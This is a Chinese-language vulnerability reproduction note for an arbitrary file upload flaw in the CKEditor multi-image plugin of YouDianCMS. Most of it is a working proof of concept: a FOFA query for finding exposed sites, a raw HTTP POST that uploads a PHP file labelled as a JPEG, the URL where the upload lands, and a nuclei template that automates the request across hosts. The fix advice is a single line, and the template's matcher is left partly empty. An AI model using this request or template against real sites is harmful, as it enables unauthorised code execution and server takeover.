YouDianCMS 友点系统 CKEditor 任意文件上传漏洞复现
1.漏洞介绍
友点CMS存在任意文件上传漏洞,攻击者通过漏洞可以上传恶意文件,获取服务器权限
2.漏洞编号
CVE | CNVD | CNNVD |
---|---|---|
- | - | - |
3.影响范围
名称 | 版本号 |
---|---|
- |
4.检索特征
FOFA:app=“友点建站-CMS” && product=“友点建站-CMS”
5.POC
POST /Public/ckeditor/plugins/multiimage/dialogs/image_upload.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Content-Length: 185
Accept: */*
Accept-Encoding: gzip, deflate, br
Connection: close
Content-Type: multipart/form-data; boundary=cadc403efc1ad12f5fcce44c172baad2
--cadc403efc1ad12f5fcce44c172baad2
Content-Disposition: form-data; name="files"; filename="c.php"
Content-Type: image/jpg
<?php phpinfo();?>
--cadc403efc1ad12f5fcce44c172baad2--
http://127.0.0.1/Public/image/uploads/1709524862134.php
nuclei脚本
id: YouDianCMS-upload
info:
name: YouDianCMS-upload
author: test
severity: info
description: description
reference:
- https://
tags: tags
http:
- raw:
- |
POST /Public/ckeditor/plugins/multiimage/dialogs/image_upload.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: close
Content-Type: multipart/form-data; boundary=cadc403efc1ad12f5fcce44c172baad2
Host: {{Hostname}}
Content-Length: 179
--cadc403efc1ad12f5fcce44c172baad2
Content-Disposition: form-data; name="files"; filename="c.php"
Content-Type: image/jpg
<?php phpinfo();?>
--cadc403efc1ad12f5fcce44c172baad2--
matchers-condition: and
matchers:
- type: word
part: body
words:
-
- type: status
status:
- 200
6.修复建议
更新到最新版本
7.参考信息
https://mp.weixin.qq.com/s/oiNffCThHJsfLhePlZjTBA